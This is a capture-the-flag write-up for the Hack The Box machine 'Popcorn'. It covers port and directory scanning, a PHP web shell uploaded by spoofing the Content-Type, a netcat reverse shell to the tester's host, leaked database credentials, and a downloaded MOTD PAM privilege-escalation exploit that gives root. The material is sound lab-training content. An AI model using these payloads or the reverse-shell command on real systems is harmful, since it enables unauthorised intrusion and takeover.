Popcorn - HTB

Details
URL	Hack The Box :: Popcorn
Difficulty	Medium
User Solves	U: 12850 ~ R: 11863
Release Date	15 Mar, 2017

Introduction

Released on 15 March 2017, Popcorn is one of the earliest challenges on the Hack The Box platform. As a medium-difficulty Linux machine, it’s well-suited for users ready to transition from beginner boxes to more advanced, skill-testing scenarios.

First Steps

The first step is a comprehensive enumeration scan to quickly identify open ports and gather detailed service information. I use the following command:

rs2nm 10.129.7.60 ./Loot

This runs RustScan for rapid port discovery, then hands off to Nmap for in-depth service enumeration. It also automatically triggers additional tools like enum4linux and others, helping build a solid information baseline right from the start. All results are neatly stored in the ./Loot directory.

Scan Output

🖥️ Host Info

• Hostname: popcorn.hackthebox.gr
• OS Detected: Linux
• CPE: cpe:/o:linux:linux_kernel

🟢 Port 22 – SSH

• Service: OpenSSH 5.1p1
• OS & Distro: Ubuntu (based on version string Debian 6ubuntu2)
• Protocol: SSH-2.0
• Host Keys:
  • DSA (1024-bit): 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38
  • RSA (2048-bit): aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d

Note: OpenSSH 5.1 is very outdated and may contain known vulnerabilities, so might be worth checking out.

🌐 Port 80 – HTTP

• Service: Apache HTTPD 2.2.12
• Title: No web page title was returned.
• Header Info: Apache/2.2.12 (Ubuntu)

Web Enumeration - GoBuster Results

A directory brute-force scan was performed using the common.txt wordlist:

gobuster dir -u http://popcorn.htb -w /usr/share/wordlists/dirb/common.txt

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 288]
/.hta                 (Status: 403) [Size: 283]
/.htaccess            (Status: 403) [Size: 288]
/cgi-bin/             (Status: 403) [Size: 287]
/index                (Status: 200) [Size: 177]
/index.html           (Status: 200) [Size: 177]
/test                 (Status: 200) [Size: 47361]
/torrent              (Status: 301) [Size: 312] [--> http://popcorn.htb/torrent/]
Progress: 4614 / 4615 (99.98%)

Exploring Discovered Directories

📁 /rename

Navigating to /rename reveals an API endpoint that provides the following usage hint:

🔍 Observation:

• Appears to be a PHP-based file renaming function. I did try testing with payloads to rename or move webroot files (e.g. renaming uploads to .php) but had no luck.

📁 /test

Accessing /test displays the output of phpinfo(), which includes:

• Full PHP version and configuration
• Loaded modules and environment variables
• Server paths and temporary directories
• Script and document root

⚙️ Gaining Initial Shell – Web Upload Exploitation

After registering an account on the Torrent Hoster application, I uploaded a benign .torrent file to test functionality. While searching for ways to rename this file into a .php shell using the /rename endpoint, I found that approach to be unfruitful.

🔄 Pivot to Metadata Upload

After uploading a torrent, the site allows the file to be edited, including adding an image (e.g., cover art or thumbnail). This opened a new attack vector — targeting the image upload feature.

🧬 Web Shell Preparation

I created a simple PHP web shell:

<?php echo system($_GET['cmd']); ?>

However, when attempting to upload it directly, the site rejected it with an “invalid file type” error.

🧰 Bypassing the Filter via Burp Suite

To bypass the upload restriction, I intercepted the upload request in Burp Suite and modified the Content-Type to disguise the payload as a legitimate image.

🔐 Modified Upload Request:

------WebKitFormBoundaryBwEpXctqn6a0uNiv
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php echo system($_GET['cmd']); ?>

By changing:

Content-Type: application/x-php

to:

Content-Type: image/png

the file was successfully accepted and stored on the server.

🖥️ Execution

Once uploaded, I navigated to the file’s location which I found based on the missing image, and triggered commands using the cmd parameter:

http://popcorn.htb/torrent//upload/01e18dabb25f43c4cad3ded13ff7f49384bcc079.php?cmd=nc%2010.10.14.2%201337%20-e%20/bin/sh

This confirmed remote code execution as the www-data user, providing a foothold on the box.

🏠 Local Enumeration – /home Directory

After gaining a shell as www-data, I began basic post-exploitation enumeration. A quick check of the /home directory revealed a user folder:

ls -la /home

drwxr-xr-x 3 george george 4096 Oct 26 2023 george

⛳ Capturing the User Flag

Inside /home/george, I discovered the user.txt file:

-rw-r--r-- 1 george george     33 Apr 30 03:46 user.txt

It was world-readable, so I simply ran:

cat /home/george/user.txt

This confirmed a successful foothold on the system and access to user-level data.

🛡️ Privilege Escalation – MOTD PAM Exploit (CVE-2010-0832)

🔍 Enumeration with LinPEAS

After obtaining user access, I ran LinPEAS to gather local privilege escalation vectors. Key findings included:

• 🐧 Kernel Version:
  Linux 2.6.31-14-generic-pae — old Ubuntu kernel from Ubuntu 9.10 (Karmic Koala)

• 📁 Interesting Config Files:
  From /var/www/torrent/config.php:

  $CFG->dbUserName = "torrent";
  $CFG->dbPassword = "SuperSecret!!";
  

  These MySQL credentials were valid but didn’t lead to anything directly exploitable.

• 📄 MOTD Legal Disclosure Message Found:
  A reference to motd.legal-displayed hinted at an outdated MOTD (Message of the Day) mechanism, often linked with privilege escalation issues on older Ubuntu systems.

🔎 Exploit Research

Referencing this article: 🔗 Softpedia - Ubuntu Bug Allows Local Users to Gain Root 🔗 ExploitDB I searched ExploitDB:

searchsploit motd
----------------------------------------------------------------------------------
 Exploit Title
----------------------------------------------------------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)         
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)           
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion                                    
----------------------------------------------------------------------------------
Shellcodes: No Results
Papers: No Results

🧪 Exploitation Process

1. Downloaded the exploit to /tmp on the target machine:

   wget http://10.10.14.2/14339.sh
   chmod +x 14339.sh
   

2. Executed the script:

   ./14339.sh
   

3. The script:

   • Injected a malicious MOTD to escalate privileges
   • Set up temporary SSH key access
   • Removed traces after execution

4. Prompted with:

   [+] Success! Use password toor to get root
   

🧑‍💻 Root Access Achieved

su - root
Password: toor

Confirmed root access:

root@popcorn:/tmp# ls ~/
root.txt

🎉 Root flag captured!